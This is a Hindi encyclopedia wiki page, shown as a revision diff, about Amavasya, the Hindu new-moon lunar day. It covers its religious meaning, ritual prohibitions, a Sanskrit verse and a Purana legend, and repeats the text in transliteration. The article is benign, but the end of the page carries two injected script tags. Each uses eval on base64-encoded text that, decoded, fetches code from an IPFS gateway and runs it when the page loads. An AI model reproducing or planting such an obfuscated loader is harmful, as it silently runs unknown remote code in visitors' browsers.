Difference between revisions of "अमावास्या"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
*जिस तिथि में [[चन्द्रमा ग्रह|चन्द्रमा]] और [[सूर्य ग्रह|सूर्य]] साथ रहते हैं, वही अमावास्या तिथि है। इसे '''अमावसी / अमावस्या''' भी कहा जाता है।
+
'''अमावस्या''' की तिथि का [[हिन्दू धर्म]] में बड़ा ही महत्त्व बताया गया है। जिस तिथि में [[चन्द्रमा ग्रह|चन्द्रमा]] और [[सूर्य ग्रह|सूर्य]] साथ रहते हैं, वही 'अमावास्या' तिथि है। इसे 'अमावसी' भी कहा जाता है। इसके साथ ही 'सिनीवाली' या 'दर्श' नाम भी प्राप्त होते हैं। अमावास्या माह की तीसवीं तिथि होती है। [[कृष्ण पक्ष]] की [[प्रतिपदा]] को कृष्ण पक्ष प्रारम्भ होता है तथा अमावास्या का समाप्त होता है। अमावास्या पर सूर्य और चन्द्रमा का अन्तर शून्य हो जाता है।
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
==महत्त्व==
*अमावास्या को ‘सिनीवाली’ या ‘दर्श’ भी कहा जाता है।
+
अमावास्या के स्वामी '[[पितर]]' होते हैं। इस तिथि में चन्द्रमा की सोलहवीं कला [[जल]] में प्रविष्ट हो जाती है। चन्द्रमा का वास अमावास्या के दिन औषधियों में रहता है, अतः [[जल]] और औषधियों में प्रविष्ट उस अमृत का ग्रहण [[गाय]], बैल, [[भैंस]] आदि पशु चारे एवं पानी के द्वारा करते हैं, जिससे वहीं अमृत हमें [[दूध]], [[घी]] आदि के रूप में प्राप्त होता है और उसी घृत की आहुति ऋषिगण [[यज्ञ]] के माध्यम से पुनः [[चंद्र देवता|चन्द्रादि]] [[देवता|देवताओं]] तक पहुँचाते हैं। वही अमृत फिर बढ़कर [[पूर्णिमा]] को चरम सीमा पर पहुँचता है; जैसा कि कथन है-
*अमावास्या तीसवीं तिथि होती है।  
+
 
*[[कृष्ण पक्ष]] की [[प्रतिपदा]] को कृष्ण पक्ष प्रारम्भ होता है तथा अमावास्या को समाप्त होता है।  
+
<blockquote><poem>कला षोडशिका या तु अपः प्रविशते सदा।
*अमावास्या पर सूर्य और चन्द्रमा का अन्तर शून्य हो जाता है।  
 
*अमावास्या के स्वामी 'पितर' होते हैं।  
 
*अमावास्या में चन्द्रमा की सोलहवीं कला जल में प्रविष्ट हो जाती है।  
 
*चन्द्रमा का वास अमावास्या के दिन औषधियों में रहता है, अतः [[जल]] और औषधियों में प्रविष्ट उस अमृत का ग्रहण [[गाय]]-बैल-भैंस आदि पशु चारे एवं पानी के द्वारा करते हैं, जिससे वहीं अमृत हमें दूध, [[घी]] आदि के रूप में प्राप्त होता है और उसी घृत की आहुति ऋषिगण [[यज्ञ]] के माध्यम से पुनः [[चंद्र देवता|चन्द्रादि]] [[देवता|देवताओं]] तक पहुँचाते हैं। वही अमृत फिर बढ़कर [[पूर्णिमा]] को चरम सीमा पर पहुँचता है; जैसा कि कथन है -
 
<poem>
 
कला षोडशिका या तु अपः प्रविशते सदा।
 
 
अमायां तु सदा सोमः औषधिः प्रतिपद्यते।।
 
अमायां तु सदा सोमः औषधिः प्रतिपद्यते।।
 
तमोषधिगतं गावः पिबन्त्यम्बुगतं च यत्।
 
तमोषधिगतं गावः पिबन्त्यम्बुगतं च यत्।
 
तत्क्षीरममृतं भुत्वा मन्त्रपूतं द्विजातिभिः।
 
तत्क्षीरममृतं भुत्वा मन्त्रपूतं द्विजातिभिः।
 
हुतमग्निषु यज्ञेशु पुनराप्यायते शशी।।
 
हुतमग्निषु यज्ञेशु पुनराप्यायते शशी।।
दिने दिने कला वृद्धिः पौर्णमास्यां तु पूर्यते।।</poem>
+
दिने दिने कला वृद्धिः पौर्णमास्यां तु पूर्यते।।</poem></blockquote>
 +
 
 
*अमावास्या में वनस्पतियों में सोम का वास होने से उस दिन बैलों को हल में जोतने का पूर्णतः निषेध 'स्मृतियों' में किया गया है। उस दिन बैलों को पूरे दिन चरने के लिये छोड़ देना चाहिये, जिससे चारे के द्वारा अमृत कला का पान कर वे अपने शरीर को पुष्ट कर कृषि कार्य में अधिक सहयोग कर सकें।  
 
*अमावास्या में वनस्पतियों में सोम का वास होने से उस दिन बैलों को हल में जोतने का पूर्णतः निषेध 'स्मृतियों' में किया गया है। उस दिन बैलों को पूरे दिन चरने के लिये छोड़ देना चाहिये, जिससे चारे के द्वारा अमृत कला का पान कर वे अपने शरीर को पुष्ट कर कृषि कार्य में अधिक सहयोग कर सकें।  
 
*अमावास्या को क्रय-विक्रय तथा समस्त शुभ कर्मों का निषेध है।
 
*अमावास्या को क्रय-विक्रय तथा समस्त शुभ कर्मों का निषेध है।
 
*अमावास्या की दिशा ईशान है।
 
*अमावास्या की दिशा ईशान है।
*अमावास्या को [[शिव]]वास [[गौरी]] के सान्निधय में होने से उस दिन शिवपूजन किया जा सकता है।  
+
*अमावास्या को [[शिव]]वास [[गौरी]] के सान्निधय में होने से उस दिन शिवपूजन किया जा सकता है।
 
*विशेष – अमावास्या तिथि [[केतु ग्रह]] की जन्म तिथि है।  
 
*विशेष – अमावास्या तिथि [[केतु ग्रह]] की जन्म तिथि है।  
 
*अमावास्या के नामकरण हेतु [[मत्स्य पुराण]] के 14 वें अध्याय में एक रूपक कथा आती है, जिसके अनुसार प्राचीन काल में पितरों ने 'आच्छोद' नामक एक सरोवर का निर्माण किया था। इन देव पितरों की एक मानसी कन्या थी, जिसका नाम था- अच्छोदा। अच्छोदा ने एक बार एक सहस्त्र दिव्य वर्षों तक कठिन तप किया। अतः उसे वर देने के लिये पितरगण पधारे। उनमें से एक अतिशय सुन्दर 'अमावसु' नामक पितर को देखकर 'अच्छोदा' उन पर अनुरक्त हो गई और अमावसु से प्रणय याचना करने लगी। किन्तु अमावसु इसके लिये तैयार नहीं हुये। अमावसु के धैर्य के कारण उस दिन की तिथि पितरों को अतिशय प्रिय हुई। उस दिन [[कृष्ण पक्ष]] की पंचदशी तिथि थी, जो कि तभी से 'अमावसु' के नाम पर ‘अमावस्या’ कहलाने लगी।  
 
*अमावास्या के नामकरण हेतु [[मत्स्य पुराण]] के 14 वें अध्याय में एक रूपक कथा आती है, जिसके अनुसार प्राचीन काल में पितरों ने 'आच्छोद' नामक एक सरोवर का निर्माण किया था। इन देव पितरों की एक मानसी कन्या थी, जिसका नाम था- अच्छोदा। अच्छोदा ने एक बार एक सहस्त्र दिव्य वर्षों तक कठिन तप किया। अतः उसे वर देने के लिये पितरगण पधारे। उनमें से एक अतिशय सुन्दर 'अमावसु' नामक पितर को देखकर 'अच्छोदा' उन पर अनुरक्त हो गई और अमावसु से प्रणय याचना करने लगी। किन्तु अमावसु इसके लिये तैयार नहीं हुये। अमावसु के धैर्य के कारण उस दिन की तिथि पितरों को अतिशय प्रिय हुई। उस दिन [[कृष्ण पक्ष]] की पंचदशी तिथि थी, जो कि तभी से 'अमावसु' के नाम पर ‘अमावस्या’ कहलाने लगी।  
Line 37: Line 32:
 
<references/>
 
<references/>
 
==अन्य संबंधित लिंक==
 
==अन्य संबंधित लिंक==
{{तिथि}}
+
{{तिथि}}{{पर्व और त्योहार}}{{व्रत और उत्सव}}
{{पर्व और त्योहार}}
+
[[Category:व्रत और उत्सव]][[Category:पर्व_और_त्योहार]][[Category:कैलंडर]]  
{{व्रत और उत्सव}}
+
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]][[Category:संस्कृति कोश]]
[[Category:व्रत और उत्सव]]
 
[[Category:पर्व_और_त्योहार]]
 
[[Category:कैलंडर]]  
 
[[Category:हिन्दू धर्म]] [[Category:हिन्दू धर्म कोश]]
 
[[Category:संस्कृति कोश]]
 
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 12:03, 19 September 2013

amavasya ki tithi ka hindoo dharm mean b da hi mahattv bataya gaya hai. jis tithi mean chandrama aur soory sath rahate haian, vahi 'amavasya' tithi hai. ise 'amavasi' bhi kaha jata hai. isake sath hi 'sinivali' ya 'darsh' nam bhi prapt hote haian. amavasya mah ki tisavian tithi hoti hai. krishna paksh ki pratipada ko krishna paksh prarambh hota hai tatha amavasya ka samapt hota hai. amavasya par soory aur chandrama ka antar shoony ho jata hai.

mahattv

amavasya ke svami 'pitar' hote haian. is tithi mean chandrama ki solahavian kala jal mean pravisht ho jati hai. chandrama ka vas amavasya ke din aushadhiyoan mean rahata hai, atah jal aur aushadhiyoan mean pravisht us amrit ka grahan gay, bail, bhaians adi pashu chare evan pani ke dvara karate haian, jisase vahian amrit hamean doodh, ghi adi ke roop mean prapt hota hai aur usi ghrit ki ahuti rrishigan yajn ke madhyam se punah chandradi devataoan tak pahuanchate haian. vahi amrit phir badhakar poornima ko charam sima par pahuanchata hai; jaisa ki kathan hai-

kala shodashika ya tu apah pravishate sada.
amayaan tu sada somah aushadhiah pratipadyate..
tamoshadhigatan gavah pibantyambugatan ch yath.
tatkshiramamritan bhutva mantrapootan dvijatibhiah.
hutamagnishu yajneshu punarapyayate shashi..
dine dine kala vriddhiah paurnamasyaan tu pooryate..

  • amavasya mean vanaspatiyoan mean som ka vas hone se us din bailoan ko hal mean jotane ka poornatah nishedh 'smritiyoan' mean kiya gaya hai. us din bailoan ko poore din charane ke liye chho d dena chahiye, jisase chare ke dvara amrit kala ka pan kar ve apane sharir ko pusht kar krishi kary mean adhik sahayog kar sakean.
  • amavasya ko kray-vikray tatha samast shubh karmoan ka nishedh hai.
  • amavasya ki disha eeshan hai.
  • amavasya ko shivvas gauri ke sannidhay mean hone se us din shivapoojan kiya ja sakata hai.
  • vishesh – amavasya tithi ketu grah ki janm tithi hai.
  • amavasya ke namakaran hetu matsy puran ke 14 vean adhyay mean ek roopak katha ati hai, jisake anusar prachin kal mean pitaroan ne 'achchhod' namak ek sarovar ka nirman kiya tha. in dev pitaroan ki ek manasi kanya thi, jisaka nam tha- achchhoda. achchhoda ne ek bar ek sahastr divy varshoan tak kathin tap kiya. atah use var dene ke liye pitaragan padhare. unamean se ek atishay sundar 'amavasu' namak pitar ko dekhakar 'achchhoda' un par anurakt ho gee aur amavasu se pranay yachana karane lagi. kintu amavasu isake liye taiyar nahian huye. amavasu ke dhairy ke karan us din ki tithi pitaroan ko atishay priy huee. us din krishna paksh ki panchadashi tithi thi, jo ki tabhi se 'amavasu' ke nam par ‘amavasya’ kahalane lagi.

tithamavasuryasyamichchhaan chakre n taan prati.
dhairyen tasy sa lokaiah amavasyeti vishruta.
pitrinaan vallabha masmattasyamakshayakarakamh..


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. hemadri (kal par chaturvarg-chintamani, pri0 311-315; 643-44), kalavivek (343-44), tithitattv (163), gobhil-grihy (1|5|5) ka bhashy, purusharth-chintamani (314-345)
  2. hemadri vratakhand (2, 246-257), madhavakrit kalanirnay (309) evan vratark (334-356

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>